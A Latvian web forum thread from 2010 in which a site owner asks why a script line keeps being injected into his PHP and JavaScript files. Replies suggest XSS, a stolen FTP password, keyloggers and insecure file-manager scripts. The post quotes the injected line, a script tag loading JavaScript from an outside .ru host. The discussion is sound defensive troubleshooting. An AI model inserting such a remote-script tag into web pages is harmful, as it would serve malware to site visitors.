Uzmācīgie vīrusi.

[forSilence]

Tātad saskāros ar tādu problēmu, kad manai mājaslapai uzbrū visādi vīrus. Visos index.php un javascript failos tie kkādīgi iedabū iekšā savus Javascript, un antivītus tos uztev kā vīrusus, kā pret tādiem var izsargāties. Reku viens piemērs.

<script type="text/javascript" src="http://pantscow.ru:8080/Video_Card.js"></script>
<!--7458ca7842b7c19a28e6ba7806246db8-->

Jo ir apnici visu laiku katrā failā dzēst ārā so rindiņu.

[briedis]

Saucās XSS uzbrukumi... derētu filtrēt datus, kas tiek saņemti no lietotāja atkarīgi nolūka (vai DB, vai attēlošanai lapā)..

 

Vēl, protams, jautājums, vai tā ir tevis taisīta sistēma, vai gatavs visiem pieejams produkts..

[Klez]

tas visticamāk ir uz tava datora. sūdīgs antivirus tev. vai arī vienk kkāds process sistēmā skenē failus un pieliek klāt šādas rindiņas. ja ir tāds process, tad tas nav vīrusss un neviens antivirus viņu neķers, jo vinsh neko sliktu nedara ... vieniigi vari meeginaat pats to kodu kādā failā ieliekt un noseivot failu. (vai antivirus kko saka vai nee)

[forSilence]

Mana mājas lapa neatrodas uz mana datora, tā hostējas techpoint telpās. Un mana mājas lapa nav gatavs cms, tikai gatavi php skripti kas ņemti internetā. Bet ieejot manā mājas lapā uzreiz mans antivīrus uzrāda šo skriptu, kā vīrusu. Un arī daudziem citiem, kad ieiet manā mājas lapā uzrāda, šo skriptu kā vīrusu.

Edited July 14, 2010 by forSilence

[mefisto]

Tāpēc ka tas pilnīgi noteikti nav nekas labs.

Un uz ko tieši tu cerēji, uzlasījis kaut kādus "gatavus php skriptus, kas ņemti internetā" ??!

 

Skatie kodā un labo kļūdas.

[ohmygod]

Kad man klientam šitāda lieta notikās - failus bija labojis FTP useris laikā, kad vienīgais usera lietotājs zvēr ka nav pat domājis par saitu. Attiecīgi - sliecos domāt, ka problēmas vainu ar FTP klientu vai serveri. Tb klientā kāds paroļu zaglis vai kas tamlīdzīgs.

Ā un IP, no kuras notikās konekcijas, pilnīgi kreisa āzijas...

 

Tā ka, ja ir iespējams - pačeko logus.

[Klez]

ir bijusi arii man taada pieredze ka caur ftp labo failus. vai suudiiga ftp parole vai arii tev pc ir kaads keylogger kas tavu paroli aizsuutiijis sliktajiem puišiem. vai arī nosnīfota. vai arī hosteris tās pārdod :D, viena ftp pass, 3 aliņi :D

[forSilence]

Nomainīju FTP paroli un ceru ka vairs neuzlauzīs.

[mounkuls]

Es par to nebūtu tik drošs:)

Pārliecinies vai nav kādi modificēti vai papildu nākuši klāt faili uz hosta sākumā, savādāk ļaundarim tā parole pie pakaļas ir:)

[forSilence]

Nekādu citu failu no hosta nav. Tikai mani, bet varbūt man uz tā paša hosta atrodas arī Cs serveris ar to pašu FTP pieeju, varbūt arī caur serveri var kkādus vīrusus pielaist?

[mounkuls]

Es protams sīkumos nezinu kas tam CS serverim tur ir, bet neliekas loģiski, ka tam ir kādas funkcijas, kur vajadzīga FTP parole.

[Maris-S]

Vienu izplatītāko iespēju, kā varēja ievietot skriptus, Briedis jau pieminēja. Tomēr ja skripti ir failos pa tiešo, tad tur ir kas sarežģītāks un jāskatās pa kurieni tikuši klāt Taviem failiem. Papildus šeit jau aprakstītajai ftp paroļu un servera drošības pārbaudei pārliecinies vai ar php skriptiem viss ir kārtībā (tiem kas darbojas ar failiem, ja tādi ir). Iespējams Tu izmanto kādus ne sevis taisītos skriptus tieši darbībām ar failiem (failu manageriem), ja tādi ir, pārliecinies ka esi nomainījis visas noklusētās paroles, caur tiem var tikt klāt, pašam ir gadījies. Ja Tavs CS serveris ir uzstādīts tādā veidā ka tā izpildes skripti var piekļūt arī otrajai mājas lapai, tad caur to arī varēja piekļūt failiem, tātad tur arī jāpārbauda failu apstrādes skripti.

Edited July 14, 2010 by Maris-S